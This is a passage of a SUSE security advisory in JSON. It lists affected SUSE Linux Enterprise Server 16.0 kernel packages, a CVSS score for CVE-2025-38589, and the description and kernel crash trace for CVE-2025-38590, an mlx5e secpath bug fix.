"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38589"
},
{
"cve": "CVE-2025-38590",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38590"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Remove skb secpath if xfrm state is not found\n\nHardware returns a unique identifier for a decrypted packet\u0027s xfrm\nstate, this state is looked up in an xarray. However, the state might\nhave been freed by the time of this lookup.\n\nCurrently, if the state is not found, only a counter is incremented.\nThe secpath (sp) extension on the skb is not removed, resulting in\nsp-\u003elen becoming 0.\n\nSubsequently, functions like __xfrm_policy_check() attempt to access\nfields such as xfrm_input_state(skb)-\u003exso.type (which dereferences\nsp-\u003exvec[sp-\u003elen - 1]) without first validating sp-\u003elen. This leads to\na crash when dereferencing an invalid state pointer.\n\nThis patch prevents the crash by explicitly removing the secpath\nextension from the skb if the xfrm state is not found after hardware\ndecryption. This ensures downstream functions do not operate on a\nzero-length secpath.\n\n BUG: unable to handle page fault for address: ffffffff000002c8\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 282e067 P4D 282e067 PUD 0\n Oops: Oops: 0000 [#1] SMP\n CPU: 12 UID: 0 PID: 0 Comm: swapper/12 Not tainted 6.15.0-rc7_for_upstream_min_debug_2025_05_27_22_44 #1 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__xfrm_policy_check+0x61a/0xa30\n Code: b6 77 7f 83 e6 02 74 14 4d 8b af d8 00 00 00 41 0f b6 45 05 c1 e0 03 48 98 49 01 c5 41 8b 45 00 83 e8 01 48 98 49 8b 44 c5 10 \u003c0f\u003e b6 80 c8 02 00 00 83 e0 0c 3c 04 0f 84 0c 02 00 00 31 ff 80 fa\n RSP: 0018:ffff88885fb04918 EFLAGS: 00010297\n RAX: ffffffff00000000 RBX: 0000000000000002 RCX: 0000000000000000\n RDX: 0000000000000002 RSI: 0000000000000002 RDI: 0000000000000000\n RBP: ffffffff8311af80 R08: 0000000000000020 R09: 00000000c2eda353\n R10: ffff88812be2bbc8 R11: 000000001faab533 R12: ffff88885fb049c8\n R13: ffff88812be2bbc8 R14: 0000000000000000 R15: ffff88811896ae00\n FS: 0000000000000000(0000) GS:ffff8888dca82000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffffff000002c8 CR3: 0000000243050002 CR4: 0000000000372eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cIRQ\u003e\n ? try_to_wake_up+0x108/0x4c0\n ? udp4_lib_lookup2+0xbe/0x150\n ? udp_lib_lport_inuse+0x100/0x100\n ? __udp4_lib_lookup+0x2b0/0x410\n __xfrm_policy_check2.constprop.0+0x11e/0x130\n udp_queue_rcv_one_skb+0x1d/0x530\n udp_unicast_rcv_skb+0x76/0x90\n __udp4_lib_rcv+0xa64/0xe90\n ip_protocol_deliver_rcu+0x20/0x130\n ip_local_deliver_finish+0x75/0xa0\n ip_local_deliver+0xc1/0xd0\n ? ip_protocol_deliver_rcu+0x130/0x130\n ip_sublist_rcv+0x1f9/0x240\n ? ip_rcv_finish_core+0x430/0x430\n ip_list_rcv+0xfc/0x130\n __netif_receive_skb_list_core+0x181/0x1e0\n netif_receive_skb_list_internal+0x200/0x360\n ? mlx5e_build_rx_skb+0x1bc/0xda0 [mlx5_core]\n gro_receive_skb+0xfd/0x210\n mlx5e_handle_rx_cqe_mpwrq+0x141/0x280 [mlx5_core]\n mlx5e_poll_rx_cq+0xcc/0x8e0 [mlx5_core]\n ? mlx5e_handle_rx_dim+0x91/0xd0 [mlx5_core]\n mlx5e_napi_poll+0x114/0xab0 [mlx5_core]\n __napi_poll+0x25/0x170\n net_rx_action+0x32d/0x3a0\n ? mlx5_eq_comp_int+0x8d/0x280 [mlx5_core]\n ? notifier_call_chain+0x33/0xa0\n handle_softirqs+0xda/0x250\n irq_exit_rcu+0x6d/0xc0\n common_interrupt+0x81/0xa0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
